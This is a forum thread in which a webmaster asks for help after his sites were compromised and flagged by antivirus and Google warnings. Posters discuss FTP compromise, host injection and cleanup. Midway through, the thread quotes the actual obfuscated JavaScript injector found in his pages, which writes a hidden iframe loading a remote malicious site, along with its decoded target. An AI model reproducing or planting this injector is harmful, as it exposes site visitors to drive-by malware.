Before you click any links in this message, be aware that some malicious code tries to run on these links!!!


I am losing my mind over this! I am soooooooo glad I finally found this site again! I have had to wipe out my computer etc... and lost this place so I started asking in another forum and have yet to get any real answers there! Basicaly my host says it is my problem. When going to some of my webpages, I get virus alerts from my AVG etc... Some malicious code or something is makinh my webpages try to send virus's and whatever else... 8( I received an email from a person saying that www.midatlanticwrestling.com tries to redirect him to some virus or something, My AVG gives me warning when I go to that page also, I have uploaded my original Index page and think it stopped it for now. I had downloaded the bad index page and my computer would not even let me open it.:(
Now on another site, same type problem, I uploaded my original index page, but it looks as if code has been written to that page right after it was uploaded!
Can I put the html on here? first the original then the changed html? dont want to cause problems on here, the website that is doing this is www.loc-jk2.com.
Please let me know what I should do to fix this and to keep these frikin losers from continuing to ruin my sites, I am sure I am losing people every day to this crud. 8(
Thank you in advance.
DaMorbid1

Please anyone! I am losing many customers and faithfull visitors!
anyone know where to get answers?
Also here is a screenshot of the warning I get when going to several of my websites:

wow, thought more would know about t5his here, oh well, only problem is I am losing visitors daily, I am 90% sure this is being done on my host, not from my puter....

I just went thorugh the whole site and i got no warnings/ un wanted redirections

I have to say this though, I really like the introduction movie on http://www.loc-jk2.com/

normally i just close the window when I get some annoying movie clip but i really enjoyed that one.

If you coded your HTML files by hand and know exactly whats in it (ie no dodgey stuf :P) then I would have to say its a server side problem.
More information about that Virus:
The Trojan is a Java Script script which is built in to HTML pages. It is 17,002 bytes in size.

I cant help out no more than that, im sorry your having troubles though

i went to both sites and experienced nothing out of the ordinary.
except for the fact that http://www.loc-jk2.com/ is just a page full of php errors and nothing else.

i went to both sites and experienced nothing out of the ordinary.
except for the fact that http://www.loc-jk2.com/ is just a page full of php errors and nothing else.

Thats just it, there is nothing PHP on that site!! I deleted the index.html page to make a point, instaed of the usual directory you get when the index page is not there, I get these PHP errors, why? I am thinking that its what is causing the malicious code, a PHP script connected to my index pages somehow (about 30 of them) and writes the code thats causing all the problems, what you think people?

Any errorsd that used to be on my suites have been fixed for now, if anyone likes I can upload the malicious coded pages to my servers somewhere and link you to them if you would like to see what it was, or post the html that was on thos pages, just put something on there so that the code does nt execute......

so what files are in your public_html folder now?

Well I have numerous files, That site is not the default site of that server.
I have probably 20-30 sites on that server now, but I will look at the folder to see if any files I dont recognize are in there.
Nothing out of the ordinary in there, I do have a forum for this website but it shouldnt have anything to do with deleting the index.html page should it?
I mean people are baffeled here and I am sure it is something simple, I am thinking someone is attacking through the forums maybe since this page shows up like it does when deleting that index.html page.
I have to finger this out asap, I now even have "this site can be harmfull" warnings coming up on google, Losing customers daily.

BTW, Would you like me to post a copy of the index.html page somewhere that still has that malicious code in it? I would think that would be a great source of info...
If so, how do I post it on me server somewhere and disable the code, use slash marks?

you could just post it on here. just put [code] [ /code] tags around it so that it's easier to read (minus that space i put in there).

//////////<head>
/<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
/<title>Untitled Document</title>
/</head>

/<frameset rows="198,297*" cols="*" framespacing="0" frameborder="no" /border="0">
/<frame src="top.html" name="topFrame" scrolling="No" noresize="noresize" id="topFrame" />
/<frame src="main.html" name="mainFrame" id="mainFrame" />
/</frameset>
/<noframes><body><!-- o4 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046 119';
s=s+'11504710210809711510404710511010010112004611210411203403211910510011610406105303210410110510310 4116';
s=s+'06105303211511612110810106103410010511511210809712105811011111010103406206004707307008206507706 9062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
/<!-- c4 -->
/</body>

That is thew code that was found in many of my index.html pages, and was not put there by me......
Of course I added the forward slashes for safety, I rekon lol.....

the code writes an <iframe> to the page whose src is "http://simocrogger.ws/flash/index.php".
so ya, it could be malicious code.

and about the slashes: putting those in the HTML does nothing, but if you put two at the start of every line of Javascript, it will disable that.

edit:
i did google "illusive fantasy" and i found several of the sites you've made (not bad from a graphics standpoint, either!), and almost all of them said "this site may be harmful" blah blah blah. but i checked their code and i didn't see anything that should cause something like that.
are all of those sites hosted on the same server (or host)?

Yes they are hosted on 2 different accounts, but same host.
Ya that neat little warning from google is the new stopbadware.com answer to harmfull websites, even though we are not responsible for this, a hacker did it, we have to suffer with this warning sometimes for months, losing rankings that took alot of hard waork, we have been trying to get them to do something less "intrusive" I guess, this really kills us, would be different if they notifies us, gave us 24hrs or something then removed the warning when the site was clean, but I have heard some people have had the warning on for months.
As a matter of fact you can look here http://groups.google.com/group/stopbadware/browse_thread/thread/2a00cc76cd0c3380
and see some of the topics being discussed, get involved before this happens to you or anyone else, its really a nightmare!
I have asked for the removal of the warnings once the sites were clean, but still the warning keeps visitors away... 8(
Thanks

BTW, Thanks for the comments on my graphics, I wish I had taken more time with coding etc, I love doing the graphic part but let DreamWeaver do the code.
I am fully self taught and now with my latest site, www.midatlanticwrestling.com I am getting alot of calls for website and graphic work.
But of course that site will probably lose its great rankings due to the ol "warning" from Google... 8(

I didn't see anything wrong either. but if you see code in your html documents than somebody has your password and is logging into your ftp and uploaded the code. Change all passwords and don't give them out. Then if you see it happening again then somebody at the server is doing it. Or somebody has another way into your account.

@Illusive: i'd be interested to know, who's your host?

Have anyone thought about the host injecting ads? I see this type of thing all that time - mostly just causes validation problems, but I can see how a host could be injecting malicious code into your site.

As mentioned before, it could also be that someone is logging in as you and editing the files manually.

Suggestions:

Change your login password - use a strong password if possible. Then fix your code on all pages. If your code immediately contains this malicious crap again (using "View Source" from your browser's menu) then it is definately your host injecting crap. If its not there immediately, but shows up again later, then its definately someone else loggin in to your account. If you suspect the host, switch hosts asap.

This is yet another reason why I run all my servers from home. I used to work in a datacenter and most our clients were smaller hosting companies and I can even begine to tell you how much malicious crap I've seen these people do. Hell, even the company I worked for had its share of malicious crap. Never fully trust your host - all they want is your money. ;)

I have had the same host for 4-5 years but am changing very soon, I have had issues with them alot, alot, a whole lot actually... lol...
Since being tagged by Google now I have been able to research this alot more, these people can inject malicious code from just about anywhere.
YOU WOULD BE WELL WARRANTED, EVERYONE TO CHECK YOUR ENTIRE SITES ASAP!!!!!!!!!
It is quite contreversial also, everyone needs to get in onn this, I myself lost valuable rankings, visitors etc...
Read it all here, beleive me its worth your time! Tell all webmasters you know also!

http://groups.google.com/group/stopbadware

http://groups.google.com/group/stopbadware/browse_thread/thread/2a00cc76cd0c3380

Beleive me, I thought I was doing everything I could to be safe, and most of my sites are just gaing clans etc...
Please make sure you look at this and check your sites asap!

oops, poted twice sry.

what i wonder is how this is happening. as in, where's the vulnerability?

what i wonder is how this is happening. as in, where's the vulnerability?

The main vulnerability is Internet Explorer. No, using another browser is not going to stop the malicios code from appearing in your code, but 99% of this code is targeted to take advantage of the Internet Explorer exploits, thus using something besides IE will greatly diminish your odds of being affected by the malicious code. ;)

I beleive the place they were getting in on me was my PHP forums etc...
Seems that is were most hackers get in, MYSQL, PHP exploits etc...
I am still trying to find a way to scan my sites daily to see if any malicious code has been injected somehow, there must be a way to check for this daily to catch these people asap!
Any ideas on software scanners that may help?

I beleive the place they were getting in on me was my PHP forums etc...
Seems that is were most hackers get in, MYSQL, PHP exploits etc...
I don't think so. you cannot use php or mysql exploit to alter just a file. If they are getting in from your forums than time to change your forums. It is not as easy as you think. to alter just one file they have to know your user/password to your ftp, or they planted a backdoor on your server then your server is not very secure. Don't blame it on php or mysql as they are just the underlining on all your apps they use to get in? If they got in that way.

I bet they have an ftp login.

The main vulnerability is Internet Explorer. No, using another browser is not going to stop the malicios code from appearing in your code, but 99% of this code is targeted to take advantage of the Internet Explorer exploits, thus using something besides IE will greatly diminish your odds of being affected by the malicious code. ;)yea ... umm ... guess i should have specified. i meant server vulnerability.